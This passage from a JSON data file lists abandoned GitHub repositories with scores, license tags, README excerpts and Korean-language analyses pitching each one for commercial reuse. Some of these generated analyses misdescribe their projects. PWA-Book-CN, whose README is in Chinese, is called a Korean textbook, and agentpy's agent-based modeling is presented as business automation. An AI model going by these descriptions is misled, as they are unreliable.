status](https://ci.appveyor.com/api/projects/status/nyidskwifo4py6ub?svg=true)](https://ci.appveyor.com/project/mcuadros/go-git) [![codecov.io](https://codecov.io/github/src-d/go-git/coverage.svg)](https://codecov.io/github/src-d/go-git) [![Go Report Card](https://goreportcard.com/badge/github.com/src-d/go-git)](https://goreportcard.com/report/github.com/src-d/go-git)\n\n*go-git* is a highly extensible git implementation library written in **pure Go**.\n\nIt can be u","composite_score":0.3214,"license_safety_tag":"safe"},{"name":"json-iterator/java","github_url":"https://github.com/json-iterator/java","stars":7,"language":"Java","license":"mit","abandonment_months":28,"description":"# json-iterator/java 분석 보고서\n\n## 왜 보물인가\n이 프로젝트는 자바 프로그래밍에서 데이터 처리를 빠르게 하는 도구로, 대량의 정보를 다루는 서비스에서 속도를 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **금융 데이터 처리 SaaS**: 실시간 주식·거래 정보를 빠르게 분석하는 웹 서비스로 제공\n2. **내부 데이터 변","readme_excerpt":"[![Build Status](https://travis-ci.org/json-iterator/java.svg?branch=master)](https://travis-ci.org/json-iterator/java)\n[![codecov](https://codecov.io/gh/json-iterator/java/branch/master/graph/badge.svg)](https://codecov.io/gh/json-iterator/java)\n[![License](http://img.shields.io/badge/license-mit-blue.svg?style=flat-square)](https://raw.githubusercontent.com/json-iterator/java/master/LICENSE)\n[![Gitter chat](https://badges.gitter.im/gitterHQ/gitter.png)](https://gitter.im/json-iterator/Lobby)\n\nDocumentation : [http://jsoniter.com/java-features.html](http://jsoniter.com/java-features.html)\n\nScala User: https://github.com/plokhotnyuk/jsoniter-scala","composite_score":0.3213,"license_safety_tag":"safe"},{"name":"ResidentMario/missingno","github_url":"https://github.com/ResidentMario/missingno","stars":5,"language":"Python","license":"mit","abandonment_months":25,"description":"# missingno 프로젝트 분석\n\n## 왜 보물인가\n데이터 분석 작업에서 불완전하거나 누락된 정보를 한눈에 시각화해 주는 도구로, 데이터 품질 문제를 빠르게 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 데이터 품질 검사 SaaS**\n- 기업이 보유한 데이터베이스의 결손 현황을 자동으로 분석하고 리포트하는 구독형 서비스\n\n**2. 데이터 분","readme_excerpt":"# missingno [![PyPi version](https://img.shields.io/pypi/v/missingno.svg)](https://pypi.python.org/pypi/missingno/) [![](https://img.shields.io/badge/python-3.7+-blue.svg)](https://www.python.org/downloads/) ![t](https://img.shields.io/badge/status-maintained-yellow.svg) [![](https://img.shields.io/github/license/ResidentMario/missingno.svg)](https://github.com/ResidentMario/missingno/blob/master/LICENSE.md) [![](https://img.shields.io/badge/doi-10.21105/joss.00547+-blue.svg)](https://joss.theoj.org/papers/10.21105/joss.00547)\n\nMessy datasets? Missing values? `missingno` provides a small toolset of flexible and easy-to-use missing data\nvisualizations and utilities that allows you to get a quick visual summary of the completeness (or lack thereof) of your dataset. Just `pip install missingno` to get started.\n\n## quickstart\n\nThis quickstart uses a sample of the [NYPD Motor Vehicle Collisions Dataset](https://data.cityofnewyork.us/Public-Safety/NYPD-Motor-Vehicle-Collisions/h9gi-nx95) dat","composite_score":0.3213,"license_safety_tag":"safe"},{"name":"tensorflow/adanet","github_url":"https://github.com/tensorflow/adanet","stars":10,"language":"Jupyter Notebook","license":"apache-2.0","abandonment_months":30,"description":"# TensorFlow AdaNet 분석 보고서\n\n## 왜 보물인가\n구글이 만든 기계학습 모델을 자동으로 설계해주는 도구로, 전문가 없이도 정확한 예측 시스템을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 매출/수요 예측 서비스 (월 구독형 클라우드 도구)\n2. **내부 업무 도구**: 은행의 대출 심사 자동화 시스템","readme_excerpt":"# AdaNet\n\n<div align=\"center\">\n  <img src=\"https://tensorflow.github.io/adanet/images/adanet_tangram_logo.png\" alt=\"adanet_tangram_logo\"><br><br>\n</div>\n\n[![Documentation Status](https://readthedocs.org/projects/adanet/badge)](https://adanet.readthedocs.io)\n[![PyPI version](https://badge.fury.io/py/adanet.svg)](https://badge.fury.io/py/adanet)\n[![Travis](https://travis-ci.org/tensorflow/adanet.svg?branch=master)](https://travis-ci.org/tensorflow/adanet)\n[![codecov](https://codecov.io/gh/tensorflow/adanet/branch/master/graph/badge.svg)](https://codecov.io/gh/tensorflow/adanet)\n[![Gitter](https://badges.gitter.im/tensorflow/adanet.svg)](https://gitter.im/tensorflow/adanet?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Downloads](https://pepy.tech/badge/adanet)](https://pepy.tech/project/adanet)\n[![License](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](https://github.com/tensorflow/adanet/blob/master/LICENSE)\n\n**AdaNet** is a lightweight TensorFlow-based framew","composite_score":0.3212,"license_safety_tag":"safe"},{"name":"360Controller/360Controller","github_url":"https://github.com/360Controller/360Controller","stars":5,"language":"C++","license":"gpl-2.0","abandonment_months":43,"description":"# 360Controller 분석 리포트\n\n## 왜 보물인가\nXbox 360 게임 컨트롤러를 컴퓨터에서 쉽게 사용할 수 있도록 만들어주는 드라이버로, 게이머와 기술 애호가들이 오래된 장비를 현대 시스템에서 활용하게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **게임 스트리밍 플랫폼**: 클라우드 게임 서비스에서 Xbox 컨트롤러 호환성을 제공하는 부가 기능\n","readme_excerpt":"# Xbox Controller Driver for macOS\r\n\r\n## Table of Contents\r\n1. [About](#about)\r\n2. [Installation](#installation)\r\n3. [Uninstallation](#uninstallation)\r\n4. [Usage](#usage)\r\n5. [My controller doesn't work!](#my-controller-doesnt-work)\r\n   1. [I'm using a driver from the Tattiebogle website](#im-using-a-driver-from-the-tattiebogle-website)\r\n   2. [My controller doesn't work with a game!](#my-controller-doesnt-work-with-a-game)\r\n   3. [How do I find my Vendor ID and Product ID?](#how-do-i-find-my-vendor-id-and-product-id)\r\n   4. [Original Xbox Controllers](#original-xbox-controllers)\r\n   5. [Wired Xbox 360 Controllers](#wired-xbox-360-controllers)\r\n   6. [Wireless Xbox 360 Controllers](#wireless-xbox-360-controllers)\r\n   7. [Xbox One Controllers connected with USB](#xbox-one-controllers-connected-with-usb)\r\n   8. [Xbox One Controllers connected with Wireless Adapter](#xbox-one-controllers-connected-with-wireless-adapter)\r\n   9. [Xbox One Controllers connected with Bluetooth](#xbox-one-cont","composite_score":0.3211,"license_safety_tag":"restricted"},{"name":"graphql/express-graphql","github_url":"https://github.com/graphql/express-graphql","stars":5,"language":"TypeScript","license":"mit","abandonment_months":39,"description":"# GraphQL/Express-GraphQL 분석 보고서\n\n## 왜 보물인가\n웹 서비스의 데이터를 효율적으로 주고받을 수 있는 기술로, 개발자들이 빠르고 유연하게 서비스를 만들 때 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n- **모바일 앱 백엔드**: 스마트폰 앱이 필요한 데이터만 받아서 속도를 높이는 서비스\n- **실시간 대시보드**: 통계나 분석 ","readme_excerpt":"_If you still need to use `express-graphql`, please [read the previous version of this readme](https://github.com/graphql/express-graphql/blob/8b6ffc65776aa40d9e03f554425a1dc14840b165/README.md)._\n\n# This library is deprecated\n\n`express-graphql` was the first official reference implementation of using GraphQL with HTTP. It has existed since 2015 and was mostly unmaintained in recent years.\n\nThe official [GraphQL over HTTP](https://github.com/graphql/graphql-over-http) work group is standardizing the way you transport GraphQL over HTTP and it made great progress bringing up the need for a fresh reference implementation.\n\nPlease read the [GraphQL over HTTP spec](https://graphql.github.io/graphql-over-http) for detailed implementation information.\n\n## Say hello to [`graphql-http`](https://github.com/graphql/graphql-http)\n\n[`graphql-http`](https://github.com/graphql/graphql-http) is now the GraphQL official reference implementation of the [GraphQL over HTTP spec](https://graphql.github.io/","composite_score":0.3211,"license_safety_tag":"safe"},{"name":"learnbyexample/Command-line-text-processing","github_url":"https://github.com/learnbyexample/Command-line-text-processing","stars":8,"language":"Shell","license":"unknown","abandonment_months":24,"description":"# Command-line-text-processing 상용화 분석\n\n## 왜 보물인가\n컴퓨터를 능숙하게 다루는 개발자나 데이터 분석가들이 매일 사용하는 텍스트 처리 기법들을 체계적으로 배울 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **B2B 온라인 교육 플랫폼**: 개발사 채용 전 실무 역량 검증을 위한 구독형 강의 콘텐츠로 기업에 판매","readme_excerpt":"# Command Line Text Processing\n\nLearn about various commands available for common and exotic text processing needs. Examples have been tested on GNU/Linux - there'd be syntax/feature variations with other distributions, consult their respective `man` pages for details.\n\n---\n\n:warning: :warning: I'm no longer actively working on this repo. Instead, I've converted existing chapters into ebooks (see [ebook section](#ebooks) below for links), available under the same license. These ebooks are better formatted, updated for newer versions of the software, includes exercises, solutions, etc. Since all the chapters have been converted, I'm archiving this repo.\n\n---\n\n<br>\n\n## Ebooks\n\nIndividual online ebooks with better formatting, explanations, exercises, solutions, etc:\n\n* [CLI text processing with GNU grep and ripgrep](https://learnbyexample.github.io/learn_gnugrep_ripgrep/)\n* [CLI text processing with GNU sed](https://learnbyexample.github.io/learn_gnused/)\n* [CLI text processing with GNU a","composite_score":0.3209,"license_safety_tag":"unknown"},{"name":"guoxiaoxing/android-open-source-project-analysis","github_url":"https://github.com/guoxiaoxing/android-open-source-project-analysis","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":29,"description":"# Android 오픈소스 프로젝트 분석 저장소 평가\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 대형 기술 회사의 소스코드를 학습하며 실무 기술을 무료로 습득할 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발자 교육 플랫폼(SaaS)**\n- 온라인 코딩 부트캠프나 개발 학습 플랫폼이 프리미엄 강좌 콘텐츠로 제공\n- 월 구독료로 수익화","readme_excerpt":"# <img src=\"https://github.com/guoxiaoxing/android-open-source-project-analysis/raw/master/art/logo.png\" alt=\"Android open source project analysis\" width=\"80\" height=\"80\" align=\"bottom\"/> Android open source project analysis\n\n**Note: The project has been moved to https://github.com/BeesAndroid/BeesAndroid.**\n\n## 功能介绍\n\n[![License](https://img.shields.io/github/license/guoxiaoxing/android-open-source-project-analysis.svg)](https://jitpack.io/#guoxiaoxing/android-open-source-project-analysis) \n[![Stars](https://img.shields.io/github/stars/guoxiaoxing/android-open-source-project-analysis.svg)](https://jitpack.io/#guoxiaoxing/android-open-source-project-analysis) \n[![Stars](https://img.shields.io/github/forks/guoxiaoxing/android-open-source-project-analysis.svg)](https://jitpack.io/#guoxiaoxing/android-open-source-project-analysis) \n[![Forks](https://img.shields.io/github/issues/guoxiaoxing/android-open-source-project-analysis.svg)](https://jitpack.io/#guoxiaoxing/android-open-source-projec","composite_score":0.3209,"license_safety_tag":"safe"},{"name":"filamentgroup/loadCSS","github_url":"https://github.com/filamentgroup/loadCSS","stars":7,"language":"JavaScript","license":"mit","abandonment_months":44,"description":"# loadCSS 저장소 분석\n\n## 왜 보물인가\n웹사이트를 더 빠르게 로딩하게 만드는 경량의 기술로, 수천 개 사이트에서 사용하는 검증된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 성능 최적화 SaaS**: 기업 웹사이트의 로딩 속도를 자동으로 개선해주는 월 구독 서비스\n2. **전자상거래 플랫폼**: 온라인 쇼핑몰의 페이지 로딩 속도를 ","readme_excerpt":":warning: This project is archived and the repository is no longer maintained. \t\t\t\t\n\n# loadCSS\n\nA pattern for loading CSS asynchronously\n[c]2020 @scottjehl, @zachleat [Filament Group, Inc.](https://www.filamentgroup.com/)\nLicensed MIT\n\n## Why an ansychronous CSS loader?\n\nReferencing CSS stylesheets with `link[rel=stylesheet]` or `@import` causes browsers to delay page rendering while a stylesheet loads. When loading stylesheets that are not critical to the initial rendering of a page, this blocking behavior is undesirable. The pattern below allows us to fetch and apply CSS asynchronously. If necessary, this repo also offers a separate (and optional) JavaScript function for loading stylesheets dynamically.\n\n\n## How to use\n\nAs a primary pattern, we recommend loading asynchronous CSS like this from HTML:\n\n`<link rel=\"stylesheet\" href=\"/path/to/my.css\" media=\"print\" onload=\"this.media='all'; this.onload=null;\">`\n\nThis article explains why this approach is best: https://www.filamentgroup.co","composite_score":0.3209,"license_safety_tag":"safe"},{"name":"SangKa/PWA-Book-CN","github_url":"https://github.com/SangKa/PWA-Book-CN","stars":208,"language":"","license":"unknown","abandonment_months":97,"description":"# SangKa/PWA-Book-CN 분석\n\n## 왜 보물인가\n스마트폰처럼 쓸 수 있으면서도 인터넷이 끊겨도 작동하는 웹앱 기술을 배울 수 있는 한국어 교과서입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 오프라인 환경에서도 작동하는 생산성 도구(메모, 할일 관리 등) 제공\n2. **내부 업무 도구**: 배송 기사나 현장 근로자가 인터넷 ","readme_excerpt":"# PWA实战：面向下一代的Progressive Web APP\n\n## 重要通知\n\n2018-6-20\n\n**由于中文纸质书的出版，原作者通过中文出版物了解到此仓库，对于在网上开源半本书的行为比较担心，所以找到我并希望能将内容下架，出于对原作者的尊重，暂时先将之前的翻译内容全部下架，希望大家能够理解。**\n\n2018-6-15\n\n**[赠书活动获奖名单](https://github.com/SangKa/PWA-Book-CN/issues/37)出炉，恭喜拿到新书的小伙伴**\n\n2018-6-7\n\n**开放网上预售: [预售链接](https://item.jd.com/12365091.html)**\n\n2018-6-6\n\n**感谢大家一直以来的支持，赠书活动来了，想第一时间拿到纸质书的小伙伴行动起来吧。[活动链接](https://github.com/SangKa/PWA-Book-CN/issues/36)**\n\n2018-5-17\n\n**编辑工作已经全部完成，现已进入印刷阶段。**\n\n2018-4-18\n\n**预计五月份正式出版，现已进入收尾阶段，后面会第一时间放出预售链接，敬请关注。另外，感谢大家这段时间以来的支持与鼓励。**\n\n2017-12-10\n\n**目前已经和本书中文版权方博文视点达成出版意向，目前已开放章节仅作为纸版书的开放阅读部分，并非完整和最终版本，后续还有大量修订和优化，后续章节目前正在紧张翻译中，虽然不会再同步开源至 GitHub ，但会第一时间在这里将翻译出版进度同步给各位 ([查看出版进度](https://github.com/SangKa/PWA-Book-CN/wiki/%E5%87%BA%E7%89%88%E8%BF%9B%E5%BA%A6))。敬请大家关注纸版书的发布，预计出版时间: 2018年上半年。另外感谢大家的关注与支持，部分读者将有机会第一时间获赠纸质书。**\n\n![Progressive Web Apps](./cover.png)\n\n## 本书相关资源\n\n* [PWA 官网](https://developers.google.com/web/progressive-web-apps/)\n* [全书代码示例](https://github.com/deanhume/progressive-web-app","composite_score":0.3207,"license_safety_tag":"unknown"},{"name":"webpack-contrib/extract-text-webpack-plugin","github_url":"https://github.com/webpack-contrib/extract-text-webpack-plugin","stars":5,"language":"JavaScript","license":"mit","abandonment_months":85,"description":"# Extract Text Webpack Plugin 평가 보고서\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 '스타일 파일'을 따로 분리해서 저장해주는 도구로, 웹페이지 로딩 속도를 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 디자인 도구 회사가 사용자들의 작업 파일을 빠르게 로딩하는 서비스에 탑재\n2. ","readme_excerpt":"# DEPRECATED\n\nPlease use: https://github.com/webpack-contrib/mini-css-extract-plugin\n\nIf you have problem(s) with migration on MiniCssExtractPlugin feel free to open issue with reproducible test repo, thanks\n\n---\n\n[![npm][npm]][npm-url]\n[![node][node]][node-url]\n[![deps][deps]][deps-url]\n[![tests][tests]][tests-url]\n[![coverage][cover]][cover-url]\n[![chat][chat]][chat-url]\n\n<div align=\"center\">\n  <img width=\"200\" height=\"200\"\n    src=\"https://cdn.rawgit.com/webpack-contrib/extract-text-webpack-plugin/574e3200/logo.svg\">\n  <a href=\"https://github.com/webpack/webpack\">\n    <img width=\"200\" height=\"200\"\n      src=\"https://webpack.js.org/assets/icon-square-big.svg\">\n  </a>\n  <h1>Extract Text Plugin</h1>\n  <p>Extract text from a bundle, or bundles, into a separate file.</p>\n</div>\n\n<h2 align=\"center\">Install</h2>\n\n```bash\n# for webpack 3\nnpm install --save-dev extract-text-webpack-plugin\n# for webpack 2\nnpm install --save-dev extract-text-webpack-plugin@2.1.2\n# for webpack 1\nnpm install --s","composite_score":0.3205,"license_safety_tag":"safe"},{"name":"chokkan/mlnote","github_url":"https://github.com/chokkan/mlnote","stars":6,"language":"Jupyter Notebook","license":"unknown","abandonment_months":16,"description":"# mlnote 저장소 분석\n\n## 왜 보물인가\n머신러닝 개념을 쉽게 정리한 학습 자료로, 복잡한 AI 원리를 누구나 이해할 수 있는 형태로 만들어 놓은 교육 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 취업 준비생과 직장인을 위한 AI 기초 강좌 구성에 활용\n2. **기업 교육 도구**: 데이터 관련 부서 신입 직원들의 온보딩","readme_excerpt":"# 機械学習帳\n\n機械学習帳は、**機械学習**を学ぶためのノート（**帳**）を、デジタル（**機械**）による新しいカタチの**学習帳**として実現することを目指しています。\n\nこの作品は<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-nd/4.0/\">クリエイティブ・コモンズ 表示 - 非営利 - 改変禁止 4.0 国際 ライセンス</a>の下に提供されています。ただし、作品中のコードセル部分は<a rel=\"license\" href=\"https://opensource.org/licenses/MIT\">MITライセンス</a>の下に提供されています。\n","composite_score":0.3205,"license_safety_tag":"unknown"},{"name":"Tencent/tencent-ml-images","github_url":"https://github.com/Tencent/tencent-ml-images","stars":9,"language":"Python","license":"NOASSERTION","abandonment_months":50,"description":"# Tencent/tencent-ml-images 분석 보고서\n\n## 왜 보물인가\n대규모 AI 이미지 데이터셋을 보유한 텐센트의 공개 자산으로, 이미지 인식·분류 기술을 개발하는 기업들이 즉시 활용할 수 있는 학습용 데이터베이스입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사진 자동 정렬, 유사 이미지 검색 기능이 있는 클라우드 사진 관리","readme_excerpt":"# Tencent ML-Images\n\nThis repository introduces the open-source project dubbed **Tencent ML-Images**, which publishes \n<!--- * **ML-Images**: the largest open-source multi-label image database, including 18,019,881 URLs to images, which are annotated with labels up to 11,166 categories-->\n* **ML-Images**: the largest open-source multi-label image database, including 17,609,752 training and 88,739 validation image URLs, which are annotated with up to 11,166 categories\n* **Resnet-101 model**: it is pre-trained on ML-Images, and achieves the top-1 accuracy 80.73% on ImageNet via transfer learning\n\n## Updates\n\n* [2019/12/26] Our manuscript of this open-source project has been accepted to IEEE Access ([Journal](https://ieeexplore.ieee.org/document/8918053/authors#authors), [ArXiv](https://arxiv.org/abs/1901.01703)). It presents more details of the database, the loss function, the training algorithm, and more experimental results. \n* [2018/12/19] We simplify the procedure of downloading imag","composite_score":0.3205,"license_safety_tag":"unknown"},{"name":"mrmrs/colors","github_url":"https://github.com/mrmrs/colors","stars":5,"language":"CSS","license":"NOASSERTION","abandonment_months":35,"description":"# mrmrs/colors 프로젝트 분석\n\n## 왜 보물인가\n디자인 작업에 필요한 색상 코드를 모아둔 작은 도구로, 디자이너들이 색상을 빠르게 찾아 쓸 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 디자인 도구에 색상 라이브러리를 통합하여 사용자가 빠르게 색상을 선택할 수 있게 제공\n2. **내부 업무 도구**: 회사 브랜","readme_excerpt":"# [colors.css 3.0.0](http://clrs.cc/)\n\n\nBetter default colors for the web. A collection of skin classes for faster prototyping and nicer looking sites.\n\n[Customize your own defaults here.](https://components.ai/theme/DIgsnuGL20I1ZwsNP3YY)\n\n#### Stats\n\n903 | 85 | 85\n---|---|---\nbytes | selectors | declarations\n\n## Installation\n\n#### With [npm](https://npmjs.com)\n\n```\nnpm install --save-dev colors.css\n```\n\n#### With Git\n\n```\ngit clone https://github.com/tachyons-css/colors.css\n```\n\n## Usage\n\n#### Using with [PostCSS](https://github.com/postcss/postcss)\n\nImport the css module\n\n```css\n@import \"colors.css\";\n```\n\nThen process the CSS using the [`tachyons-cli`](https://github.com/tachyons-css/tachyons-cli)\n\n```sh\n$ npm i -g tachyons-cli\n$ tachyons-cli path/to/css-file.css > dist/t.css\n```\n\n#### Using the CSS\n\nThe built CSS is located in the `css` directory. It contains an unminified and minified version.\nYou can either cut and paste that css or link to it directly in your html.\n\n```html\n<link","composite_score":0.3205,"license_safety_tag":"unknown"},{"name":"square/workflow","github_url":"https://github.com/square/workflow","stars":40,"language":"Shell","license":"Apache-2.0","abandonment_months":1,"description":"# square/workflow 저장소 분석\n\n## 왜 보물인가\n복잡한 업무 과정을 자동으로 정리하고 연결해주는 도구로, 회사의 반복적인 작업을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 회사들이 구독하는 '자동 업무 정리 플랫폼'으로 월 구독료 수익 창출\n- **내부 업무 도구**: 대기업 HR·재무팀이 사원 입사/퇴","readme_excerpt":"# Overview\n\n[![GitHub license](https://img.shields.io/badge/license-Apache%20License%202.0-blue.svg?style=flat)](https://www.apache.org/licenses/LICENSE-2.0)\n\nWorkflow is a unidirectional data flow (UDF) library that\nprovides navigation and state management for Kotlin and Swift applications.\nIt can be compared to (and helped inspire!)\n[TCA](https://github.com/pointfreeco/swift-composable-architecture),\n[Circuit](https://github.com/slackhq/circuit)\nand [Molecule](https://github.com/cashapp/molecule).\n\nWorkflow's main difference from its peers is its opionated take on navigation:\nthat navigation is just another form of presenter state to be managed,\nnot a separate special concern.\n\nWorkflow…\n\n* Uses immutable data within each Workflow.\n  Data flows in a single direction from source to UI, and events in a single direction\n  from the UI to the business logic.\n* Supports writing business logic and complex UI navigation logic as\n  state machines, thereby enabling confident reasoning about st","composite_score":0.3205,"license_safety_tag":"safe"},{"name":"sachinruk/deepschool.io","github_url":"https://github.com/sachinruk/deepschool.io","stars":6,"language":"Jupyter Notebook","license":"NOASSERTION","abandonment_months":39,"description":"# deepschool.io 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 인공지능을 배우고 활용할 수 있는 교육 플랫폼으로, AI 기술의 대중화 시대에 매우 적절한 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 SaaS**: 기업과 개인 학습자를 대상으로 한 구독형 온라인 강좌 플랫폼\n2. **기업 내부 교육 도구**: 직원들의 AI 리터러","readme_excerpt":"# DeepSchool.io\n<!--\n<img  src=\"https://dl.dropboxusercontent.com/s/5kubbg4bvz0idwn/high_resolution_small.jpg\" alt=\"logo\" style=\"max-width:30%;\"/>\n-->\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![Binder](https://mybinder.org/badge.svg)](https://mybinder.org/v2/gh/sachinruk/deepschool.io/master)\n## [Sign up here](https://www.udemy.com/course/machine-learning-and-data-science-2021/?referralCode=E79228C7436D74315787) for Udemy Course on Machine Learning (Use code DEEPSCHOOL-MARCH to get 85% off course).\n\n\n## Goals\n1. Make Deep Learning easier (minimal code).\n2. Minimise required mathematics.\n3. Make it practical (runs on laptops).\n4. Open Source Deep Learning Learning.\n5. Grow a collaborating practical community around DL.\n6. Memes: No seriously. Make DL fun and interactive, this means more Trump tweets.\n\n## Support Us\nThere's a few ways you can support this initiative:\n1. Sign up to the Udemy course above.\n2. Subs","composite_score":0.3204,"license_safety_tag":"unknown"},{"name":"KingJA/LoadSir","github_url":"https://github.com/KingJA/LoadSir","stars":5,"language":"Java","license":"unknown","abandonment_months":66,"description":"# LoadSir 저장소 분석\n\n## 왜 보물인가\n앱이나 웹사이트에서 데이터를 불러올 때 로딩 상태, 오류, 빈 화면 등을 깔끔하게 표시해주는 도구라 개발자들의 반복 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발사**: 앱 사용자들에게 \"지금 데이터를 받아오는 중입니다\" 같은 상태를 명확히 보여주는 SaaS 개발 플랫폼","readme_excerpt":"![](imgs/LoadSir.jpg)\n\n中文 | [English](README-en.md)\n\nLoadSir\n---\n\n[![](https://img.shields.io/badge/%20%20Android%20Arsenal%20%20-%20%20LoadSir%20%20-blue.svg)](https://android-arsenal.com/details/1/6227)\n[![](https://img.shields.io/badge/%20%20aar%20size-26KB-green.svg)](https://bintray.com/kingja/maven/loadsir#files/com%2Fkingja%2Floadsir%2Floadsir%2F1.2.0)\n:point_right:[![](https://img.shields.io/github/release/KingJA/LoadSir.svg)](https://github.com/KingJA/LoadSir/releases):point_left:\n\n`LoadSir`是一个高效易用，低碳环保，扩展性良好的加载反馈页管理框架，在加载网络或其他数据时候，根据需求切换状态页面，\n可添加自定义状态页面，如加载中，加载失败，无数据，网络超时，如占位图，登录失效等常用页面。可配合网络加载框架，结合返回\n状态码，错误码，数据进行状态页自动切换，封装使用效果更佳。\n\n使用场景\n---\n| **in Activity**|**in View**|**in Fragment**|\n|:---:|:----:|:----:|\n|![](imgs/normal_activity.gif)|![](imgs/view_activity.gif)|![](imgs/single_fragment.gif)|\n\n| **Placeholder**|**Muitl-Fragment**|**ViewPage+Fragment**|\n|:---:|:----:|:----:|\n|![](imgs/placeholder_activity.gif)|![](imgs/muitl_fragment.gif)|![](imgs/viewpage_fragment.gif)|\n\n","composite_score":0.3203,"license_safety_tag":"unknown"},{"name":"dzikoysk/advent-of-code","github_url":"https://github.com/dzikoysk/advent-of-code","stars":10,"language":"Shell","license":"GPL-2.0","abandonment_months":18,"description":"","readme_excerpt":"# Advent of Code\n[Advent of Code 2019-2024](https://adventofcode.com/) in [Panda](https://github.com/panda-lang/panda)\n\n### Background\nThe aim of project is to explore the pre-alpha version of [Panda](https://github.com/panda-lang/panda) language.\nImplementations of various programming puzzles should expose vulnerabilities, bugs and ill-thought-out solutions.\n\n### Run\n```bash\ngit clone https://github.com/dzikoysk/advent-of-code.git\n\ncd <year>\n./run.sh <day> <user>\n```\n\n### Progress\n\n#### 2024\n\n| Day | Name                                                      | Panda | \n|:---:|:----------------------------------------------------------|:-----:|\n|  -  | Advent of Code 2024                                       | 0.5.2 |\n| 01  | [Historian Hysteria](https://adventofcode.com/2024/day/1) |   ✓   |\n| 02  | [Red-Nosed Reports](https://adventofcode.com/2024/day/2)  |   ✓   |\n\n#### 2023-2022\n\n| Day | Name                |    Panda    | \n|:---:|:--------------------|:-----------:|\n|  >  | Advent","composite_score":0.3203,"license_safety_tag":"restricted"},{"name":"andlabs/libui","github_url":"https://github.com/andlabs/libui","stars":5,"language":"C","license":"NOASSERTION","abandonment_months":24,"description":"# libui 저장소 분석 보고서\n\n## 왜 보물인가\nWindows, Mac, Linux 모두에서 동일하게 작동하는 사용자 인터페이스를 만드는 기초 도구로, 멀티플랫폼 애플리케이션 개발의 복잡성을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 대기업의 HR, 회계 부서가 Windows/Mac 모두에서 동작하는 데이터 관리 ","readme_excerpt":"# libui: a portable GUI library for C\n\nThis README is being written.<br>\n[![Build Status, Azure Pipelines](https://dev.azure.com/andlabs/libui/_apis/build/status/andlabs.libui?branchName=master)](https://dev.azure.com/andlabs/libui/_build/latest?definitionId=1&branchName=master)<br>\n[![Build Status, AppVeyor](https://ci.appveyor.com/api/projects/status/ouyk78c52mmisa31/branch/master?svg=true)](https://ci.appveyor.com/project/andlabs/libui/branch/master)\n\n## Status\n\nIt has come to my attention that I have not been particularly clear about how usable or feature-complete libui is, and that this has fooled many people into expecting more from libui right this moment than I have explicitly promised to make available. I apologize for not doing this sooner.\n\nlibui is currently **mid-alpha** software. Much of what is currently present runs stabily enough for the examples and perhaps some small programs to work, but the stability is still a work-in-progress, much of what is already there is not","composite_score":0.3202,"license_safety_tag":"unknown"},{"name":"danielquinn/paperless","github_url":"https://github.com/danielquinn/paperless","stars":6,"language":"Python","license":"gpl-3.0","abandonment_months":63,"description":"# Paperless (danielquinn/paperless) 분석\n\n## 왜 보물인가\n종이 문서를 디지털로 자동 정리하고 검색할 수 있게 해주는 개인용 문서 관리 시스템으로, 종이 서류가 많은 소상공인과 가정에서 바로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. SaaS 서비스:** 중소기업向 전자 문서 관리 구독 서비스 (월 요금제로 클라","readme_excerpt":"[ en | [de](README-de.md) | [el](README-el.md) ]\n\n![Paperless](https://raw.githubusercontent.com/the-paperless-project/paperless/master/src/paperless/static/paperless/img/logo-dark.png)\n\n> ## Important news about the future of this project\n> \n> It's been more than 5 years since I started this project on a whim as an effort to try to get a handle on the massive amount of paper I was dealing with in relation to various visa applications (expat life is complicated!)  Since then, the project has *exploded* in popularity, so much so that it overwhelmed me and working on it stopped being \"fun\" and started becoming a serious source of stress.\n> \n> In an effort to fix this, I created the Paperless GitHub [organisation](https://github.com/the-paperless-project), and brought on a few people to manage the issue and pull request load.  Unfortunately, that model has proven to be unworkable too.  With 23 pull requests waiting and 157 issues slowly filling up with confused/annoyed people wanting to g","composite_score":0.3202,"license_safety_tag":"restricted"},{"name":"JoelForamitti/agentpy","github_url":"https://github.com/JoelForamitti/agentpy","stars":28,"language":"Python","license":"BSD-3-Clause","abandonment_months":16,"description":"# agentpy 상업화 분석\n\n## 왜 보물인가\n컴퓨터가 스스로 일을 처리하도록 프로그래밍할 수 있는 도구로, 반복되는 업무를 자동화하려는 기업들이 매우 필요로 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업용 자동화 SaaS 플랫폼**\n- 영업, 고객지원, 데이터 처리 등 반복 업무를 자동으로 처리하는 웹 서비스로 판매\n\n**2. 내부 업무 효율화 ","readme_excerpt":"# AgentPy - Agent-based modeling in 